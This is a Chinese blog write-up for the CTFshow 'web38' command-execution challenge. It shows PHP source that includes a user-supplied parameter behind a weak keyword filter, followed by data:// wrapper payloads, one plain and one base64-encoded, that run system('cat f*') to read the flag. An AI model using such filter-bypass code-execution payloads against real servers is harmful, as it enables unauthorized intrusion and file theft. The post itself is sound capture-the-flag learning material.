CTFshow 命令执行 web38

最新推荐文章于 2022-11-08 18:24:22 发布

Kradress

最新推荐文章于 2022-11-08 18:24:22 发布

阅读量163

点赞数

分类专栏： CTFshow 文章标签：前端

本文链接：https://blog.csdn.net/Kracxi/article/details/121040761

版权

CTFshow 专栏收录该内容

194 篇文章 18 订阅

订阅专栏

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

发现过滤了php和file，php和file伪协议都不能用了，继续用data伪协议
?c=data://text/plain,<?php system("cat f*")?>
发现什么都没有显示，原因是php被过滤，使用base64编码就好了
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/PiA=

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CTFshow 命令执行 web38

源码<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Modified time: 2020-09-04 05:23:36# @email: h1xa@ctfer.com# @link: https://ctfer.com*///flag in flag.phperror_reporting(0);if(
复制链接

扫一扫